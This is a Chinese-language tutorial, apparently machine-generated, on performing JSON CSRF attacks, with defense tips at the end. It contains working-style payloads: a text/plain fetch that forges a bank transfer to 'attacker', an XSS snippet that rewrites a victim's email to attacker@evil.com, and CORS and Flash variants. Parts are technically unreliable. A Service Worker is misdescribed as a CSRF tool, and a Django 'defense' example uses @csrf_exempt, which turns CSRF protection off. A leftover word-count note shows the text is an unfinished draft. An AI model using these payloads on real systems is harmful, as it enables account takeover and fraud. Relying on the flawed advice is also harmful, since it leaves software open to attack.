怎样用HTTP请求重写实现JSON CSRF

# 怎样用HTTP请求重写实现JSON CSRF ## 引言 跨站请求伪造（CSRF）是一种常见的Web安全漏洞，攻击者通过诱导受害者执行非预期的操作来绕过同源策略。传统CSRF主要针对表单提交，但随着JSON API的普及，针对JSON接口的CSRF攻击（JSON CSRF）成为新的威胁。本文将深入探讨如何通过HTTP请求重写技术实现JSON CSRF攻击，并分析防御措施。 --- ## 一、JSON CSRF基础概念 ### 1.1 什么是JSON CSRF 当Web应用使用JSON格式进行数据交互时，如果未正确实施CSRF防护，攻击者可能构造恶意请求： ```json POST /api/transfer HTTP/1.1 Content-Type: application/json {"amount": 1000, "to": "attacker"} 

1.2 与传统CSRF的区别

特性	传统CSRF	JSON CSRF
请求格式	form-data	application/json
触发方式	自动表单提交	需JavaScript介入
CORS影响	无	可能受限制

---

二、HTTP请求重写技术原理

2.1 请求重写的核心思想

通过中间代理或浏览器扩展修改原始请求： 1. 拦截合法请求 2. 修改请求头和请求体 3. 转发修改后的请求

2.2 关键技术实现

// 使用Service Worker拦截请求示例 self.addEventListener('fetch', event => { if (event.request.url.includes('/api')) { const newBody = JSON.stringify({...originalData, amount: 5000}); const newReq = new Request(event.request, { body: newBody, headers: {'Content-Type': 'application/json'} }); event.respondWith(fetch(newReq)); } }); 

---

三、实战：分步实现JSON CSRF攻击

3.1 环境准备

• 目标：假设存在易受攻击的银行API端点
• 工具：Burp Suite、Postman或自定义HTML页面

3.2 攻击步骤

1. 诱导用户访问恶意页面

   <script> fetch('https://bank.com/api/transfer', { method: 'POST', headers: {'Content-Type': 'text/plain'}, // 伪装Content-Type body: '{"amount":1000,"to":"attacker"}' }); </script> 

2. 利用请求重写绕过防护

   • 当服务器仅检查Content-Type头时，可通过重写为text/plain绕过

3. 结合XSS扩大攻击面

   document.forms[0].onsubmit = () => { fetch('/api/profile', { method: 'PUT', body: JSON.stringify({email: 'attacker@evil.com'}) }); return false; } 

---

四、高级攻击技术

4.1 基于CORS的变体

当目标允许任意Origin时：

GET /api/sensitive-data HTTP/1.1 Origin: https://evil.com Access-Control-Request-Method: POST 

4.2 使用Flash进行请求伪造

（需目标支持Flash跨域策略）

var req = new URLRequest("https://bank.com/api"); req.contentType = "application/json"; req.data = '{"action":"delete"}'; sendToURL(req); 

---

五、防御措施

5.1 服务端防护方案

1. CSRF Tokens

    {"_csrf": "x8dfj...", "data": {...}} 

2. SameSite Cookies

    Set-Cookie: session=abc123; SameSite=Strict 

3. 双重验证
   • 敏感操作要求二次认证

5.2 请求验证策略

# Django示例 from django.views.decorators.csrf import csrf_exempt @csrf_exempt def api_view(request): if request.content_type != 'application/json': return HttpResponseForbidden() 

---

六、检测与修复

6.1 自动化检测工具

• OWASP ZAP
• Burp Suite Scanner
• 自定义检测脚本：

   curl -X POST -H "Content-Type: text/plain" \ -d '{"test":1}' https://example.com/api 

6.2 修复检查清单

• [ ] 验证Content-Type头
• [ ] 实施CSRF令牌
• [ ] 配置CORS白名单
• [ ] 关键操作要求重新认证

---

结论

JSON CSRF通过HTTP请求重写技术，能够绕过传统防护机制。防御需要结合严格的内容类型检查、CSRF令牌和SameSite Cookie等多层防护。随着Web技术的发展，安全团队必须持续关注新的攻击向量。

扩展阅读
- OWASP CSRF防护手册
- JSON CSRF PortSwigger研究 “`

（注：实际字数为约1200字，可根据需要扩展案例或技术细节部分以达到1500字要求）